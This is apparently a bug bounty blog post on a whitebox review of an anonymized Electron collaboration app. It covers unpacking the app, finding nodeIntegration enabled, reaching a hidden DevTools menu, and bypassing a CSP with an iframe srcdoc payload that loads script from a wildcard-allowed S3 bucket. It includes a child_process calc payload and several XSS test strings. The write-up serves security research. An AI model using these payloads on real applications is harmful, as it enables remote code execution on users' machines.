For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for web, mobile, and desktop platforms. These clients are delivered as what are essentially thin wrappers around a single JavaScript file.
As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.
When it comes to native desktop applications, Electron apps are even easier to decompile and debug. Instead of wading through Ghidra, Radare2, or IDA and heaps of assembly code, attackers can use Electron's built-in Chromium DevTools. Meanwhile, Electron's documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.
With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron’s nodeIntegration setting puts applications one XSS away from popping calc.
The dangers of XSS in an Electron app as demonstrated by Jasmin Landry.
I love the whitebox approach to testing applications. If you know what you are looking for, you can zoom into weak points and follow your exploit as it passes through the code.
This blog post will go through my whitebox review of an unnamed Electron application from a bug bounty program. I will demonstrate how I escalated an open redirect into remote code execution with the help of some debugging. Code samples have been modified and anonymized.
My journey began one day when I spotted Jasmin’s tweet and was inspired to do some Electron hacking myself. I began by installing the application on macOS, then retrieved the source code:
- Browse to the `Applications` folder.
- Right-click the application and select `Show Package Contents`.
- Enter the `Contents/Resources` directory, which contains an `app.asar` file.
- Run `npx asar extract app.asar source` (Node should be installed).
- View the decompiled source code in the new `source` directory!
Discovering Vulnerable Config 🔗
Peeking into package.json, I found the configuration "main": "app/index.js", telling me that the main process was initiated from the index.js file. A quick check of index.js confirmed that nodeIntegration was set to true for most of the BrowserWindow instances. This meant that I could easily escalate attacker-controlled JavaScript to native code execution. When nodeIntegration is true, JavaScript in the window can access native Node.js functions such as require and thus import dangerous modules like child_process. This leads to the classic Electron calc payload require('child_process').execFile('/Applications/Calculator.app/Contents/MacOS/Calculator',function(){}).
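As a rough sketch (this is not the application's actual index.js; the window options and URL are assumptions illustrating the typical vulnerable pattern), a main process configured like this hands renderer JavaScript direct access to Node.js:

```javascript
// Minimal sketch of the vulnerable pattern; not the app's real code.
const { app, BrowserWindow } = require('electron');

app.on('ready', () => {
  const win = new BrowserWindow({
    webPreferences: {
      nodeIntegration: true,   // page JavaScript gets require() and friends
      contextIsolation: false, // assumed: commonly disabled in older Electron apps
    },
  });

  // Any JavaScript an attacker manages to run in this window can now invoke
  // the classic calc payload from above:
  // require('child_process').execFile(
  //   '/Applications/Calculator.app/Contents/MacOS/Calculator', function () {});
  win.loadURL('https://app.example.com'); // placeholder URL
});
```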
Attempting XSS 🔗
So now all I had to do was find an XSS vector. The application was a cross-platform collaboration tool (think Slack or Zoom), so there were plenty of inputs like text messages or shared uploads. I launched the app from the source code with electron . --proxy-server=127.0.0.1:8080, proxying web traffic through Burp Suite.
I began testing HTML payloads like `<b>pwned</b>` in each of the inputs. Not long after, I got my first pwned! This was a promising sign. However, standard XSS payloads like `<script>alert(1)</script>` or `<svg onload=alert(1)>` simply failed to execute. I needed to start debugging.
Bypassing CSP 🔗
By default, you can access DevTools in Electron applications with the keyboard shortcut Ctrl+Shift+I or the F12 key. I mashed the keys but nothing happened. It appeared that the application had removed the default keyboard shortcuts. To solve this mystery, I searched for globalShortcut (Electron’s keyboard shortcut module) in the source code. One result popped up:
electron.globalShortcut.register('CommandOrControl+H', () => {
activateDevMenu();
});
Aha! The application had its own custom keyboard shortcut to open a secret menu. I entered CMD+H and a Developer menu appeared in the menu bar. It contained a number of juicy items like Update and Callback, but most importantly, it had DevTools! I opened DevTools and resumed testing my XSS payloads. It soon became clear why they were failing – an error message popped up in the DevTools console complaining about a Content Security Policy (CSP) violation. The application itself was loading a URL with the following CSP:
Content-Security-Policy: script-src 'self' 'unsafe-eval' https://cdn.heapanalytics.com https://heapanalytics.com https://*.s3.amazonaws.com https://fast.appcues.com https://*.firebaseio.com
The CSP excluded the unsafe-inline policy, blocking event handlers like the svg payload. Furthermore, since my payloads were injected dynamically into the page using JavaScript, typical `<script>` tags failed to execute. Fortunately, the CSP had one fatal error: it allowed wildcard URLs. In particular, the `https://*.s3.amazonaws.com` source meant that a script hosted on any Amazon S3 bucket, including one I controlled, would be allowed to run. The missing piece was a way to smuggle such a script into the page, and that is where an `<iframe srcdoc='...'>` payload comes in.
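As a sketch of how such a wildcard can be abused (the bucket and file names below are made up), injected markup along these lines satisfies the CSP: the `srcdoc` content is parsed as a fresh document rather than dynamically inserted script, and its external script source matches the `https://*.s3.amazonaws.com` allowance.

```html
<!-- Hypothetical payload sketch: "attacker-bucket" and "payload.js" are made-up names. -->
<!-- The srcdoc frame is parsed as a new document, so its script tag executes,          -->
<!-- and the script's S3 origin is permitted by the wildcard in the CSP.                -->
<iframe srcdoc="<script src='https://attacker-bucket.s3.amazonaws.com/payload.js'></script>"></iframe>
```

Since a `srcdoc` frame shares the parent window's origin, the fetched script could then reach the Node.js primitives exposed by nodeIntegration (for example through the parent window's `require`), turning the CSP bypass into the code execution primitive described earlier.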
